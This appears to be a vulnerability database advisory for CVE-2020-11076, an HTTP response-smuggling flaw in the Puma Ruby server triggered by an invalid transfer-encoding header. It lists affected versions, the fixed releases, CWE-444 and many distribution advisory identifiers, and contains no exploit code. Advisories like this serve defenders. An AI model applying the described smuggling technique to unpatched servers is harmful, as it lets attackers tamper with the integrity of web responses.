PT-2020-3713 · Ruby+4 · Puma+4

Zeddyu

·

Published

2020-05-22

·

Updated

2026-03-13

·

CVE-2020-11076

CVSS v2.0

7.8

High

VectorAV:N/AC:L/Au:N/C:N/I:C/A:N
Name of the Vulnerable Software and Affected Versions: Puma versions prior to 3.12.5 Puma versions prior to 4.3.4
Description: The issue is related to the handling of HTTP requests in Puma, a RubyGem for Ruby/Rack applications. An attacker could smuggle an HTTP response by using an invalid transfer-encoding header, potentially allowing a remote attacker to impact the integrity of information. The problem has been fixed in Puma 3.12.5 and Puma 4.3.4.
Recommendations: For Puma versions prior to 3.12.5, update to version 3.12.5 to resolve the issue. For Puma versions prior to 4.3.4, update to version 4.3.4 to resolve the issue.

Exploit

Fix

HTTP Request/Response Smuggling

Weakness Enumeration

CWE-444

Related Identifiers

ALT-PU-2021-2596
ALT-PU-2023-4271
ALT-PU-2024-7817
BDU:2020-04071
CVE-2020-11076
DLA-2398-1
GHSA-X7JG-6PWG-FX5H
OESA-2021-1169
OPENSUSE-SU-2020:0990-1
OPENSUSE-SU-2020:1001-1
OPENSUSE-SU-2020:1993-1
OPENSUSE-SU-2020:2000-1
OPENSUSE-SU-2020_0990-1
OPENSUSE-SU-2020_1001-1
OPENSUSE-SU-2020_1993-1
OPENSUSE-SU-2020_2000-1
OPENSUSE-SU-2024:10589-1
OPENSUSE-SU-2024:11342-1
OPENSUSE-SU-2024:11343-1
OPENSUSE-SU-2024:11830-1
OPENSUSE-SU-2024:11847-1
OPENSUSE-SU-2024:12592-1
OPENSUSE-SU-2024:12900-1
OPENSUSE-SU-2024:13166-1
OPENSUSE-SU-2024:13720-1
OPENSUSE-SU-2024:13721-1
OPENSUSE-SU-2025:15123-1
OPENSUSE-SU-2026:10357-1
SUSE-RU-2020:2072-1
SUSE-SU-2020:1901-1
SUSE-SU-2020:1919-1
SUSE-SU-2020:2060-1
SUSE-SU-2020:3036-1
SUSE-SU-2020:3147-1
SUSE-SU-2020:3160-1
SUSE-SU-2020_1919-1
USN-6682-1

Affected Products

Alt Linux
Linuxmint
Puma
Suse
Ubuntu